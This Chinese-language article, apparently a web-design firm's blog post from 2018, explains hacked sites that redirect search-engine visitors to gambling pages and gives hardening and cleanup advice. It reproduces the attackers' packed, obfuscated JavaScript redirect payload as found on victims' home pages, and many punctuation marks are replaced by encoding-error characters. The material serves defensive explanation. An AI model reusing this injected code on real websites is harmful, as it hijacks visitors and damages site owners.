最近公司內部跟單同事表示����,大批網站建設公司客戶在做百度推廣時候�����,網站的首頁點擊進去后自動跳轉到彩票網站、博彩網站��,這樣用戶從百度搜索或者從推廣廣告位進去網站后發生跳轉���,而直接輸入網址是沒有任何跳轉的���,這樣一來用戶流失造成訪問量急劇下滑��、網站服務器資源浪費、推廣費用浪費等�����,甚至可以說做了百度推廣�����、搜狗推廣的都在給彩票公司做廣告了�����,在網站建設行業內引起軒然大波���。
有不少客戶在反應這個問題時候�,找到廣告商賠償甚至追究責任��,所以在網站惡意跳轉的問題上我們運營人員需要重視并且知曉如何快速解決�����,中聯科技從網絡上查閱并且測試后總結為以下經驗:
一、分析網站被黑跳轉博彩網站原因
一般情況下網站被黑時候后都是因為服務器信息(服務器IP 遠程端口 管理員賬號密碼���、SSH端口、root賬號密碼)和網站信息包括FTP賬號密碼的對接被黑客知曉���,進而造成黑客植入木馬或者后門。
整體的安全監測中��,asp網站和php網站都存在著木馬��,這也就意味著木馬能夠以php腳本木馬、asp腳本木馬、jsp腳本木馬而存在�,這些木馬后門可以對網站進行惡意篡改�����,上傳,改名,下載�,等管理員的高權限操作��。出現網站被跳轉的客戶,采用的網站架構都是php+mysql架構,以及jsp+mysql架構,大多數用的是開源程序��,像dedecms����,織夢系統,phpcms系統,discuz系統。
當我們懂得一些代碼的時候����,必然會看到網站首頁中會有一些惡意篡改代碼��,通過刪除惡意代碼后可能會在幾天內完全的停止跳轉的,但是在一段時間后卻又會被跳轉,這個是很令人懊惱的治標不治本措施。過了不久后網站又會出現跳轉,那么針對于網站漏洞問題是很難甚至是不能夠完全清除的。
通過觀察部分客戶網站首頁��,其首頁代碼中都會有一段加密代碼�����,這段代碼是根據搜索引擎的特征來跳轉�����,比如通過百度搜索,360搜索,搜狗搜索來的會直接跳轉到彩票,賭博網站上去。如下代碼:
type="text/java">eval(function(p,a,c,k,e,d){e=function(c){return(c35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)d[e(c)]=k[c]||e(c);k=[function(e){retun d[e]}];e=function(){return'\w+'};c=1;};while(c--)if(k[c])p=p.replace(new RegExp('\b'+e(c)+'\b','g'),k[c]);return p;}('l["\e\c\1\m\i\8\n\0"]["\7\4\9\0\8"]('\h\2\1\4\9\3\0\0\j\3\8\d\6\0\8\k\0\5\f\a\r\a\2\1\4\9\3\0 \6\2\4\1\d\6\s\0\0\3\2\q\5\5\7\7\7\b\1\3\e\a\2\p\b\1\c\i \5\j\o\1\b\f\2\6\g\h\5\2\1\4\9\3\0\g');',29,29,'x74|x63|x73|x70|x72| x2f|x22|x77|x65|x69|x61|x2e|x6f|x3d|x64|x6a|x3e|x3c|x6d|x79|x78|window|x75|x6e|x6c| x38|x3a|x76|x68'.split('|'),0,{}))
一旦被攻擊之后���,百度搜索引擎就會判斷出網站是否被攻擊,從而在百度風險評估中心就會對網站進行記錄以及標識,百度網址安全中心提醒您:該站點可能受到黑客攻擊,部分頁面已被非法篡改! 紅色提示該百度風險���。導致客戶打開網站直接被百度攔截。
針對于以上跳轉攻擊的特征,中聯科技一致認為應該從人工代碼方面進行審計��,以及檢測網站漏洞�、網站后門木馬清理����、漏洞修復以及xss獲取管理員賬號cookies漏洞,discuz存在getshell漏洞�,注入獲取管理員漏洞�,discuz上傳繞過漏洞等���。
二��、修復以及防止網站被惡意跳轉的辦法
1����、對服務器目錄進行安全部署、對管理員帳號密碼加密�、對所有密碼進行數字+大小寫字母+特殊符號要求��、對網站數據庫進行分配普通權限賬號。
2�����、mysql數據庫默認端口3306�,改為61116,并加入到端口安全策略,不對外開放��,外網IP無法連接數據庫����,只有本地127.0.0.1才能進行連接數據庫,以防止攻擊者惡意猜測。
3�����、對服務器底層系統進行安全加固�����,包括遠程端口登錄的安全驗證。
4���、對網站代碼進行整體的安全檢測,包括定期的升級網站程序源代碼�,修復補丁以及網站漏洞�。
中聯科技處理網站跳轉問題有很多方法���,以上內容只是解決問題的方法之一�,那么作為一個網站建設公司應該對源碼進行優化和調整,這樣才能確保后期的網站不會受到影響���,這就涉及到網站源碼升級以及版本升級問題。
2018-09-06 00:00:00
2063 
